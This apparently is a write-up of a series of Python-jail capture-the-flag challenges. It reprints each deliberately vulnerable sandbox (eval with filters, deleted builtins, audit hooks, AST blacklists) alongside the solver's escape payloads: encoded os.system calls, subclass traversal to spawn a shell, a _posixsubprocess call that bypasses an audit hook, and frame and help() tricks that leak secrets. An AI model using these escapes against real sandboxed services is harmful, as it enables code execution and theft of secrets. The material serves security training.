本文最后更新于 335 天前,其中的信息可能已经有所发展或是发生改变。
| WELCOME = ''' |
| _ ______ _ _ _ _ |
| | | | ____| (_) | | (_) | |
| | |__ | |__ __ _ _ _ __ _ __ ___ _ __ | | __ _ _| | |
| | '_ \| __| / _` | | '_ \| '_ \ / _ \ '__| _ | |/ _` | | | |
| | |_) | |___| (_| | | | | | | | | __/ | | |__| | (_| | | | |
| |_.__/|______\__, |_|_| |_|_| |_|\___|_| \____/ \__,_|_|_| |
| __/ | |
| |___/ |
| ''' |
| |
| print(WELCOME) |
| |
| print("Welcome to the python jail") |
| print("Let's have an beginner jail of calc") |
| print("Enter your expression and I will evaluate it for you.") |
| input_data = input("> ") |
| print('Answer: {}'.format(eval(input_data))) |
| __import__('os').system('cat flag') |
| open('flag').read() |
| def filter(s): |
| not_allowed = set('"\'`ib') |
| return any(c in not_allowed for c in s) |
| |
| WELCOME = ''' |
| _ _ _ _ _ _ _ __ |
| | | (_) (_) (_) | | | | /_ | |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| || | |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ || | |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ || | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_||_| |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
| |
| print(WELCOME) |
| |
| print("Welcome to the python jail") |
| print("Let's have an beginner jail of calc") |
| print("Enter your expression and I will evaluate it for you.") |
| input_data = input("> ") |
| if filter(input_data): |
| print("Oh hacker!") |
| exit(0) |
| print('Answer: {}'.format(eval(input_data))) |
| a = "__import__('os').system('cat flag')" |
| exp = "" |
| for i in a: |
| exp += f"chr({ord(i)})+" |
| print(f"eval({exp[:-1]})") |
| eval(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(39)+chr(111)+chr(115)+chr(39)+chr(41)+chr(46)+chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109)+chr(40)+chr(39)+chr(99)+chr(97)+chr(116)+chr(32)+chr(102)+chr(108)+chr(97)+chr(103)+chr(39)+chr(41)) |
| WELCOME = ''' |
| _ _ _ _ _ _ _ ___ |
| | | (_) (_) (_) | | | | |__ \ |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| | ) | |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ | / / |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ |/ /_ |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_|____| |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
| |
| print(WELCOME) |
| |
| print("Welcome to the python jail") |
| print("Let's have an beginner jail of calc") |
| print("Enter your expression and I will evaluate it for you.") |
| input_data = input("> ") |
| if len(input_data)>13: |
| print("Oh hacker!") |
| exit(0) |
| print('Answer: {}'.format(eval(input_data))) |
| eval(input()) |
| __import__("os").system("cat flag") |
| #the length is be limited less than 13 |
| #it seems banned some payload |
| #banned some unintend sol |
| #Can u escape it?Good luck! |
| |
| def filter(s): |
| BLACKLIST = ["exec","input","eval"] |
| for i in BLACKLIST: |
| if i in s: |
| print(f'{i!r} has been banned for security reasons') |
| exit(0) |
| |
| WELCOME = ''' |
| _ _ _ _ _ _ _ ___ _____ |
| | | (_) (_) (_) | | | |__ \ | ____| |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | _____ _____| | ) | | |__ |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | |/ _ \ \ / / _ \ | / / |___ \ |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | __/\ V / __/ |/ /_ _ ___) | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_|_|\___| \_/ \___|_|____(_)____/ |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
| |
| print(WELCOME) |
| |
| print("Welcome to the python jail") |
| print("Let's have an beginner jail of calc") |
| print("Enter your expression and I will evaluate it for you.") |
| input_data = input("> ") |
| filter(input_data) |
| if len(input_data)>13: |
| print("Oh hacker!") |
| exit(0) |
| print('Answer: {}'.format(eval(input_data))) |
| breakpoint() |
| __import__('os').system('cat flag') |
| WELCOME = ''' |
| _ _ _ _ _ _ _ ____ |
| | | (_) (_) (_) | | | | |___ \ |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| | __) | |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ ||__ < |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ |___) | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_|____/ |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
| |
| print(WELCOME) |
| #the length is be limited less than 7 |
| #it seems banned some payload |
| #Can u escape it?Good luck! |
| print("Welcome to the python jail") |
| print("Let's have an beginner jail of calc") |
| print("Enter your expression and I will evaluate it for you.") |
| input_data = input("> ") |
| if len(input_data)>7: |
| print("Oh hacker!") |
| exit(0) |
| print('Answer: {}'.format(eval(input_data))) |
| |
| |
| BANLIST = ['__loader__', '__import__', 'compile', 'eval', 'exec', 'chr'] |
| eval_func = eval |
| for m in BANLIST: |
| del __builtins__.__dict__[m] |
| del __loader__, __builtins__ |
| def filter(s): |
| not_allowed = set('"\'`') |
| print(not_allowed) |
| return any(c in not_allowed for c in s) |
| WELCOME = ''' |
| _ _ _ _ _ _ _ _ _ |
| | | (_) (_) (_) | | | | | || | |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| | || |_ |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ |__ _| |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ | | | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_| |_| |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
| print(WELCOME) |
| print("Welcome to the python jail") |
| print("Let's have an beginner jail of calc") |
| print("Enter your expression and I will evaluate it for you.") |
| while True: |
| try: |
| input_data = input("> ") |
| if filter(input_data): |
| print("Oh hacker!") |
| print('Answer: {}'.format(eval_func(input_data))) |
| except Exception as e: |
| print(e) |
| open(bytes([46, 47, 102, 108, 97, 103]).decode()).read() # ./flag |
| BANLIST = ['__loader__', '__import__', 'compile', 'eval', 'exec', 'chr', 'input','locals','globals'] |
| |
| my_eval_func_0002321 = eval |
| my_input_func_2309121 = input |
| |
| for m in BANLIST: |
| del __builtins__.__dict__[m] |
| |
| del __loader__, __builtins__ |
| |
| def filter(s): |
| not_allowed = set('"\'`') |
| return any(c in not_allowed for c in s) |
| |
| WELCOME = ''' |
| _ _ _ _ _ _ _ _ _ ___ _____ |
| | | (_) (_) (_) | | | | | || | / _ \ | ____| |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| | || |_| | | || |__ |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ |__ _| | | ||___ \ |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ | | |_| |_| | ___) | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_| |_(_)\___(_)____/ |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
| |
| print(WELCOME) |
| |
| print("Welcome to the python jail") |
| print("Let's have an beginner jail of calc") |
| print("Enter your expression and I will evaluate it for you.") |
| print("Banned __loader__,__import__,compile,eval,exec,chr,input,locals,globals and `,\",' Good luck!") |
| input_data = my_input_func_2309121("> ") |
| if filter(input_data): |
| print("Oh hacker!") |
| exit(0) |
| print('Answer: {}'.format(my_eval_func_0002321(input_data))) |
| open(bytes([46, 47, 102, 108, 97, 103]).decode()).read() |
| Answer: |
| |
| BANLIST = ['__loader__', '__import__', 'compile', 'eval', 'exec', 'chr','input','locals','globals','bytes'] |
| my_eval_func_ABDC8732 = eval |
| my_input_func_001EC9GP = input |
| for m in BANLIST: |
| del __builtins__.__dict__[m] |
| del __loader__, __builtins__ |
| def filter(s): |
| not_allowed = set('"\'`') |
| return any(c in not_allowed for c in s) |
| WELCOME = ''' |
| _ _ _ _ _ _ _ _ _ __ |
| | | (_) (_) (_) | | | | | || |/_ | |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| | || |_| | |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ |__ _| | |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ | | |_| | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_| |_(_)_| |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
| print(WELCOME) |
| print("Welcome to the python jail") |
| print("Let's have an beginner jail of calc") |
| print("Enter your expression and I will evaluate it for you.") |
| print("Banned __loader__,__import__,compile,eval,exec,chr,input,locals,globals,bytes and `,\",' Good luck!") |
| input_data = my_input_func_001EC9GP("> ") |
| if filter(input_data): |
| print("Oh hacker!") |
| exit(0) |
| print('Answer: {}'.format(my_eval_func_ABDC8732(input_data))) |
| my_eval_func_ABDC8732(my_input_func_001EC9GP()) |
| ().__class__.__base__.__subclasses__()[137].__init__.__globals__['system']("sh") |
| cat f* |
| BANLIST = ['__loader__', '__import__', 'compile', 'eval', 'exec', 'chr','input','locals','globals','bytes','type','open'] |
| |
| my_eval_func_002EFCDB = eval |
| my_input_func_000FDCAB = input |
| |
| for m in BANLIST: |
| del __builtins__.__dict__[m] |
| |
| del __loader__, __builtins__ |
| |
| def filter(s): |
| not_allowed = set('"\'`+') |
| return any(c in not_allowed for c in s) |
| |
| def main(): |
| WELCOME = ''' |
| _ _ _ _ _ _ _ _ _ ____ |
| | | (_) (_) (_) | | | | | || | |___ \ |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| | || |_ __) | |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ |__ _||__ < |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ | | |_ ___) | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_| |_(_)____/ |
| __/ | _/ | |
| |___/ |__/ |
| |
| ''' |
| |
| print(WELCOME) |
| |
| print("Welcome to the python jail") |
| print("Let's have an beginner jail of calc") |
| print("Enter your expression and I will evaluate it for you.") |
| print("Banned __loader__,__import__,compile,eval,exec,chr,input,locals,globals,bytes,open,type and `,\",',+ Good luck!") |
| input_data = my_input_func_000FDCAB("> ") |
| if filter(input_data): |
| print("Oh hacker!") |
| exit(0) |
| print('Answer: {}'.format(my_eval_func_002EFCDB(input_data))) |
| |
| if __name__ == '__main__': |
| main() |
| ().__class__.__base__.__subclasses__()[-4].__init__.__globals__[[i for i in ().__class__.__base__.__subclasses__()[-4].__init__.__globals__].pop(47)](().__class__.__base__.__subclasses__()[6]([99, 97, 116, 32, 42]).decode()) |
| #It's an challenge for jaillevel5 let's read your flag! |
| import load_flag |
| flag = load_flag.get_flag() |
| def main(): |
| WELCOME = ''' |
| _ _ _ _ _ _ _ _____ |
| | | (_) (_) (_) | | | | ____| |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | _____ _____| | |__ |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | |/ _ \ \ / / _ \ |___ \ |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | __/\ V / __/ |___) | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_|_|\___| \_/ \___|_|____/ |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
| print(WELCOME) |
| print("It's so easy challenge!") |
| print("Seems flag into the dir()") |
| repl() |
| def repl(): |
| my_global_dict = dict() |
| my_global_dict['my_flag'] = flag |
| input_code = input("> ") |
| complie_code = compile(input_code, '<string>', 'single') |
| exec(complie_code, my_global_dict) |
| if __name__ == '__main__': |
| main() |
| class secert_flag(str): |
| def __repr__(self) -> str: |
| return "DELETED" |
| def __str__(self) -> str: |
| return "DELETED" |
| class flag_level5: |
| def __init__(self, flag: str): |
| setattr(self, 'flag_level5', secert_flag(flag)) |
| def get_flag(): |
| with open('flag') as f: |
| return flag_level5(f.read()) |
| ''.join(my_flag.flag_level5) |
| NSSCTF{3b707fa6-65d4-4cd3-8b5b-5bfa6b63bc2a} |
| breakpoint() |
| __import__('os').system('cat *') |
| flag=NSSCTF{3b707fa6-65d4-4cd3-8b5b-5bfa6b63bc2a} |
| my_flag.flag_level5.index('NSSCTF{*') |
| import sys |
| |
| def my_audit_hook(my_event, _): |
| WHITED_EVENTS = set({'builtins.input', 'builtins.input/result', 'exec', 'compile'}) |
| if my_event not in WHITED_EVENTS: |
| raise RuntimeError('Operation not permitted: {}'.format(my_event)) |
| |
| def my_input(): |
| dict_global = dict() |
| while True: |
| try: |
| input_data = input("> ") |
| except EOFError: |
| print() |
| break |
| except KeyboardInterrupt: |
| print('bye~~') |
| continue |
| if input_data == '': |
| continue |
| try: |
| complie_code = compile(input_data, '<string>', 'single') |
| except SyntaxError as err: |
| print(err) |
| continue |
| try: |
| exec(complie_code, dict_global) |
| except Exception as err: |
| print(err) |
| |
| |
| def main(): |
| WELCOME = ''' |
| _ _ _ _ _ _ _ __ |
| | | (_) (_) (_) | | | | | / / |
| | |__ ___ __ _ _ _ __ _ __ ___ _ __ _ __ _ _| | | | _____ _____| |/ /_ |
| | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _` | | | | |/ _ \ \ / / _ \ | '_ \ |
| | |_) | __/ (_| | | | | | | | | __/ | | | (_| | | | | | __/\ V / __/ | (_) | |
| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| | |\__,_|_|_| |_|\___| \_/ \___|_|\___/ |
| __/ | _/ | |
| |___/ |__/ |
| ''' |
| |
| CODE = ''' |
| dict_global = dict() |
| while True: |
| try: |
| input_data = input("> ") |
| except EOFError: |
| print() |
| break |
| except KeyboardInterrupt: |
| print('bye~~') |
| continue |
| if input_data == '': |
| continue |
| try: |
| complie_code = compile(input_data, '<string>', 'single') |
| except SyntaxError as err: |
| print(err) |
| continue |
| try: |
| exec(complie_code, dict_global) |
| except Exception as err: |
| print(err) |
| ''' |
| |
| print(WELCOME) |
| |
| print("Welcome to the python jail") |
| print("Let's have an beginner jail of calc") |
| print("Enter your expression and I will evaluate it for you.") |
| print("White list of audit hook ===> builtins.input,builtins.input/result,exec,compile") |
| print("Some code of python jail:") |
| print(CODE) |
| my_input() |
| |
| if __name__ == "__main__": |
| sys.addaudithook(my_audit_hook) |
| main() |
| __builtins__["__loader__"].load_module("_posixsubprocess").fork_exec([b"/usr/bin/cat", "flag"], [b"/usr/bin/cat"], True, (), None, None, -1, -1, -1, -1, -1, -1, *(__builtins__["__loader__"].load_module('os').pipe()), False, False, None, None, None, -1, None) |
| exec("globals()['__builtins__'].set=lambda x: ['builtins.input', 'builtins.input/result','exec', 'compile', 'os.system']\nimport os\nos.system('cat flag')") |
| import ast |
| import sys |
| import os |
| |
| WELCOME = ''' |
| |
| _ _ _ _ _ _ _ ______ |
| (_) (_) | | | (_) | | | |____ | |
| _ __ _ _| | | |__ ___ __ _ _ _ __ _ __ ___ _ __ | | _____ _____| | / / |
| | |/ _` | | | | '_ \ / _ \/ _` | | '_ \| '_ \ / _ \ '__| | |/ _ \ \ / / _ \ | / / |
| | | (_| | | | | |_) | __/ (_| | | | | | | | | __/ | | | __/\ V / __/ | / / |
| | |\__,_|_|_| |_.__/ \___|\__, |_|_| |_|_| |_|\___|_| |_|\___| \_/ \___|_|/_/ |
| _/ | __/ | |
| |__/ |___/ |
| |
| ''' |
| |
| def verify_ast_secure(m): |
| for x in ast.walk(m): |
| match type(x): |
| case (ast.Import|ast.ImportFrom|ast.Call|ast.Expr|ast.Add|ast.Lambda|ast.FunctionDef|ast.AsyncFunctionDef|ast.Sub|ast.Mult|ast.Div|ast.Del): |
| print(f"ERROR: Banned statement {x}") |
| return False |
| return True |
| |
| |
| def exexute_code(my_source_code): |
| print("Pls input your code: (last line must contain only --HNCTF)") |
| while True: |
| line = sys.stdin.readline() |
| if line.startswith("--HNCTF"): |
| break |
| my_source_code += line |
| |
| tree_check = compile(my_source_code, "input_code.py", 'exec', flags=ast.PyCF_ONLY_AST) |
| if verify_ast_secure(tree_check): |
| print("check is passed!now the result is:") |
| compiled_code = compile(my_source_code, "input_code.py", 'exec') |
| exec(compiled_code) |
| print("Press any key to continue") |
| sys.stdin.readline() |
| |
| |
| while True: |
| os.system("clear") |
| print(WELCOME) |
| print("=================================================================================================") |
| print("== Welcome to the calc jail beginner level7,It's AST challenge ==") |
| print("== Menu list: ==") |
| print("== [G]et the blacklist AST ==") |
| print("== [E]xecute the python code ==") |
| print("== [Q]uit jail challenge ==") |
| print("=================================================================================================") |
| ans = (sys.stdin.readline().strip()).lower() |
| if ans == 'g': |
| print("=================================================================================================") |
| print("== Black List AST: ==") |
| print("== 'Import,ImportFrom,Call,Expr,Add,Lambda,FunctionDef,AsyncFunctionDef ==") |
| print("== Sub,Mult,Div,Del' ==") |
| print("=================================================================================================") |
| print("Press any key to continue") |
| sys.stdin.readline() |
| elif ans == 'e': |
| my_source_code = "" |
| exexute_code(my_source_code) |
| elif ans == 'q': |
| print("Bye") |
| quit() |
| else: |
| print("Unknown options!") |
| quit() |
| @exec |
| @input |
| class A: |
| pass |
| --HNCTF |
| |
| __import__('os').system('cat flag') |
| import os |
| import sys |
| import traceback |
| import pwnlib.util.safeeval as safeeval |
| |
| |
| _const_codes = [ |
| 'POP_TOP','ROT_TWO','ROT_THREE','ROT_FOUR','DUP_TOP', |
| 'BUILD_LIST','BUILD_MAP','BUILD_TUPLE','BUILD_SET', |
| 'BUILD_CONST_KEY_MAP', 'BUILD_STRING', |
| 'LOAD_CONST','RETURN_VALUE','STORE_SUBSCR', 'STORE_MAP', |
| 'LIST_TO_TUPLE', 'LIST_EXTEND', 'SET_UPDATE', 'DICT_UPDATE', 'DICT_MERGE', |
| ] |
| |
| _expr_codes = _const_codes + [ |
| 'UNARY_POSITIVE','UNARY_NEGATIVE','UNARY_NOT', |
| 'UNARY_INVERT','BINARY_POWER','BINARY_MULTIPLY', |
| 'BINARY_DIVIDE','BINARY_FLOOR_DIVIDE','BINARY_TRUE_DIVIDE', |
| 'BINARY_MODULO','BINARY_ADD','BINARY_SUBTRACT', |
| 'BINARY_LSHIFT','BINARY_RSHIFT','BINARY_AND','BINARY_XOR', |
| 'BINARY_OR', |
| ] |
| |
| blocklist_codes = _expr_codes + ['MAKE_FUNCTION', 'CALL_FUNCTION'] |
| |
| TURING_PROTECT_SAFE = True |
| |
| banned = ''' |
| [ |
| 'POP_TOP','ROT_TWO','ROT_THREE','ROT_FOUR','DUP_TOP', |
| 'BUILD_LIST','BUILD_MAP','BUILD_TUPLE','BUILD_SET', |
| 'BUILD_CONST_KEY_MAP', 'BUILD_STRING','LOAD_CONST','RETURN_VALUE', |
| 'STORE_SUBSCR', 'STORE_MAP','LIST_TO_TUPLE', 'LIST_EXTEND', 'SET_UPDATE', |
| 'DICT_UPDATE', 'DICT_MERGE','UNARY_POSITIVE','UNARY_NEGATIVE','UNARY_NOT', |
| 'UNARY_INVERT','BINARY_POWER','BINARY_MULTIPLY','BINARY_DIVIDE','BINARY_FLOOR_DIVIDE', |
| 'BINARY_TRUE_DIVIDE','BINARY_MODULO','BINARY_ADD','BINARY_SUBTRACT','BINARY_LSHIFT', |
| 'BINARY_RSHIFT','BINARY_AND','BINARY_XOR','BINARY_OR','MAKE_FUNCTION', 'CALL_FUNCTION' |
| ] |
| ''' |
| |
| code = ''' |
| import os |
| import sys |
| import traceback |
| import pwnlib.util.safeeval as safeeval |
| input_data = input('> ') |
| print(expr(input_data)) |
| def expr(n): |
| if TURING_PROTECT_SAFE: |
| m = safeeval.test_expr(n, blocklist_codes) |
| return eval(m) |
| else: |
| return safeeval.expr(n) |
| ''' |
| |
| WELCOME = ''' |
| ______ __ _ |
| ____ | ____| / _| | | |
| ___ / __ \| |__ ___ ___ __ _| |_ ___ _____ ____ _| | |
| / __|/ / _` | __/ _ \ / __|/ _` | _/ _ \/ _ \ \ / / _` | | |
| \__ \ | (_| | | | __/ \__ \ (_| | || __/ __/\ V / (_| | | |
| |___/\ \__,_|_| \___| |___/\__,_|_| \___|\___| \_/ \__,_|_| |
| \____/ |
| ''' |
| |
| |
| def expr(n): |
| if TURING_PROTECT_SAFE: |
| m = safeeval.test_expr(n, blocklist_codes) |
| return eval(m) |
| else: |
| return safeeval.expr(n) |
| |
| try: |
| print(WELCOME) |
| print('Turing s@Fe mode:', 'on' if TURING_PROTECT_SAFE else 'off') |
| print('Black List:') |
| print(banned) |
| print('some code:') |
| print(code) |
| while True: |
| input_data = input('> ') |
| try: |
| print(expr(input_data)) |
| except Exception as err: |
| traceback.print_exc(file=sys.stdout) |
| except EOFError as input_data: |
| print() |
| (lambda: os.system('/bin/sh'))() |
| cat flag |
| WELCOME = ''' |
| _ _ ___ ___ _____ _ _ _ |
| | | | | / _ \ |__ \ |_ _| | | | | | |
| _ __ _ _| |_| |__ | | | |_ __ ) | | | _ __ _ __ | | | | |_ |
| | '_ \| | | | __| '_ \| | | | '_ \ / / | | | '_ \| '_ \| | | | __| |
| | |_) | |_| | |_| | | | |_| | | | |/ /_ _| |_| | | | |_) | |__| | |_ |
| | .__/ \__, |\__|_| |_|\___/|_| |_|____| |_____|_| |_| .__/ \____/ \__| |
| | | __/ | | | |
| |_| |___/ |_| |
| ''' |
| |
| print WELCOME |
| |
| print "Welcome to the python jail" |
| print "But this program will repeat your messages" |
| input_data = input("> ") |
| print input_data |
| __import__("os").system('cat flag') |
| #it seems have a backdoor |
| #can u find the key of it and use the backdoor |
| |
| fake_key_var_in_the_local_but_real_in_the_remote = "[DELETED]" |
| |
| def func(): |
| code = input(">") |
| if(len(code)>9): |
| return print("you're hacker!") |
| try: |
| print(eval(code)) |
| except: |
| pass |
| |
| def backdoor(): |
| print("Please enter the admin key") |
| key = input(">") |
| if(key == fake_key_var_in_the_local_but_real_in_the_remote): |
| code = input(">") |
| try: |
| print(eval(code)) |
| except: |
| pass |
| else: |
| print("Nooo!!!!") |
| |
| WELCOME = ''' |
| _ _ _ _ _ _ |
| | | | | | | | | | | | | |
| | | __ _| | _____ | | __ _| | _____ | | __ _| | _____ |
| | |/ _` | |/ / _ \ | |/ _` | |/ / _ \ | |/ _` | |/ / _ \ |
| | | (_| | < __/ | | (_| | < __/ | | (_| | < __/ |
| |_|\__,_|_|\_\___| |_|\__,_|_|\_\___| |_|\__,_|_|\_\___| |
| ''' |
| |
| print(WELCOME) |
| |
| print("Now the program has two functions") |
| print("can you use dockerdoor") |
| print("1.func") |
| print("2.backdoor") |
| input_data = input("> ") |
| if(input_data == "1"): |
| func() |
| exit(0) |
| elif(input_data == "2"): |
| backdoor() |
| exit(0) |
| else: |
| print("not found the choice") |
| exit(0) |
| 1 |
| |
| globals() |
| |
| {'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7f090e9a0ac0>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, '__file__': '/home/ctf/./server.py', '__cached__': None, 'key_9b1d015375213e21': 'a34af94e88aed5c34fb5ccfe08cd14ab', 'func': <function func at 0x7f090eb3fd90>, 'backdoor': <function backdoor at 0x7f090ea01fc0>, 'WELCOME': '\n'} |
| |
| 2 |
| |
| a34af94e88aed5c34fb5ccfe08cd14ab |
| |
| __import__("os").system('cat flag') |
| #it seems have a backdoor as `lake lake lake` |
| #but it seems be limited! |
| #can u find the key of it and use the backdoor |
| fake_key_var_in_the_local_but_real_in_the_remote = "[DELETED]" |
| def func(): |
| code = input(">") |
| if(len(code)>6): |
| return print("you're hacker!") |
| try: |
| print(eval(code)) |
| except: |
| pass |
| def backdoor(): |
| print("Please enter the admin key") |
| key = input(">") |
| if(key == fake_key_var_in_the_local_but_real_in_the_remote): |
| code = input(">") |
| try: |
| print(eval(code)) |
| except: |
| pass |
| else: |
| print("Nooo!!!!") |
| WELCOME = ''' |
| _ _ _ _ _ _ |
| | | ____ | | | | ____ | | | | ____ | | |
| | | / __ \| | _____ | | / __ \| | _____ | | / __ \| | _____ |
| | |/ / _` | |/ / _ \ | |/ / _` | |/ / _ \ | |/ / _` | |/ / _ \ |
| | | | (_| | < __/ | | | (_| | < __/ | | | (_| | < __/ |
| |_|\ \__,_|_|\_\___| |_|\ \__,_|_|\_\___| |_|\ \__,_|_|\_\___| |
| \____/ \____/ \____/ |
| ''' |
| print(WELCOME) |
| print("Now the program has two functions") |
| print("can you use dockerdoor") |
| print("1.func") |
| print("2.backdoor") |
| input_data = input("> ") |
| if(input_data == "1"): |
| func() |
| exit(0) |
| elif(input_data == "2"): |
| backdoor() |
| exit(0) |
| else: |
| print("not found the choice") |
| exit(0) |
1 > help() > server > 1 > help() > server
第一次 help() 中查看 server 时,环境变为 server.py,此时可以查看变量
ke_9d38ee7f31d6126d = ’95c720690c2c83f0982ffba63ff87338′
NSSCTF{422d9d33-4c34-49ec-889c-a7fd7dd3f15a}
| |
| |
| |
| |
| import random |
| from io import StringIO |
| import sys |
| sys.addaudithook |
| |
| BLACKED_LIST = ['compile', 'eval', 'exec', 'open'] |
| |
| eval_func = eval |
| open_func = open |
| |
| for m in BLACKED_LIST: |
| del __builtins__.__dict__[m] |
| |
| |
| def my_audit_hook(event, _): |
| BALCKED_EVENTS = set({'pty.spawn', 'os.system', 'os.exec', 'os.posix_spawn','os.spawn','subprocess.Popen'}) |
| if event in BALCKED_EVENTS: |
| raise RuntimeError('Operation banned: {}'.format(event)) |
| |
| def guesser(): |
| game_score = 0 |
| sys.stdout.write('Can u guess the number? between 1 and 9999999999999 > ') |
| sys.stdout.flush() |
| right_guesser_question_answer = random.randint(1, 9999999999999) |
| sys.stdout, sys.stderr, challenge_original_stdout = StringIO(), StringIO(), sys.stdout |
| |
| try: |
| input_data = eval_func(input(''),{},{}) |
| except Exception: |
| sys.stdout = challenge_original_stdout |
| print("Seems not right! please guess it!") |
| return game_score |
| sys.stdout = challenge_original_stdout |
| |
| if input_data == right_guesser_question_answer: |
| game_score += 1 |
| |
| return game_score |
| |
| WELCOME=''' |
| _ _ __ _ _ __ _ _ __ |
| | | | |/ / | | | |/ / | | | |/ / |
| | | __ _| ' / ___ | | __ _| ' / ___ | | __ _| ' / ___ |
| | |/ _` | < / _ \ | |/ _` | < / _ \ | |/ _` | < / _ \ |
| | | (_| | . \ __/ | | (_| | . \ __/ | | (_| | . \ __/ |
| |_|\__,_|_|\_\___| |_|\__,_|_|\_\___| |_|\__,_|_|\_\___| |
| |
| ''' |
| |
| def main(): |
| print(WELCOME) |
| print('Welcome to my guesser game!') |
| game_score = guesser() |
| if game_score == 1: |
| print('you are really super guesser!!!!') |
| print(open_func('flag').read()) |
| else: |
| print('Guess game end!!!') |
| |
| if __name__ == '__main__': |
| sys.addaudithook(my_audit_hook) |
| main() |
| list(__import__('sys')._getframe(1).f_locals.values())[1] |
| MY_FLAG = "NSSCTF{fake_flag_in_local_but_really_in_The_remote}" |
| BLACED_KLIST = '"%&\',-/_:;@\\`{|}~*<=>[] \t\n\r' |
| def my_safe_check(n): |
| return all(ord(m) < 0x7f for m in n) and all(m not in n for m in BLACED_KLIST) |
| def my_safe_eval(m, my_func): |
| if not my_safe_check(m): |
| print("Hacker!!!!") |
| else: |
| try: |
| print(eval(f"{my_func.__name__}({m})", {"__builtins__": {my_func.__name__: my_func}, "flag": MY_FLAG})) |
| except: |
| print("Try again!") |
| if __name__ == "__main__": |
| my_safe_eval(input("Payload:"), type) |
eval 的执行环境很干净,啥都没有,能用的只有数据类型的初始属性,并且所有魔法方法都不能用,意味着全程只能用 flag 中存在的东西操作 flag
| dir('') |
| ['__add__', '__class__', '__contains__', '__delattr__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__getitem__', '__getnewargs__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__iter__', '__le__', '__len__', '__lt__', '__mod__', '__mul__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__rmod__', '__rmul__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'capitalize', 'casefold', 'center', 'count', 'encode', 'endswith', 'expandtabs', 'find', 'format', 'format_map', 'index', 'isalnum', 'isalpha', 'isascii', 'isdecimal', 'isdigit', 'isidentifier', 'islower', 'isnumeric', 'isprintable', 'isspace', 'istitle', 'isupper', 'join', 'ljust', 'lower', 'lstrip', 'maketrans', 'partition', 'removeprefix', 'removesuffix', 'replace', 'rfind', 'rindex', 'rjust', 'rpartition', 'rsplit', 'rstrip', 'split', 'splitlines', 'startswith', 'strip', 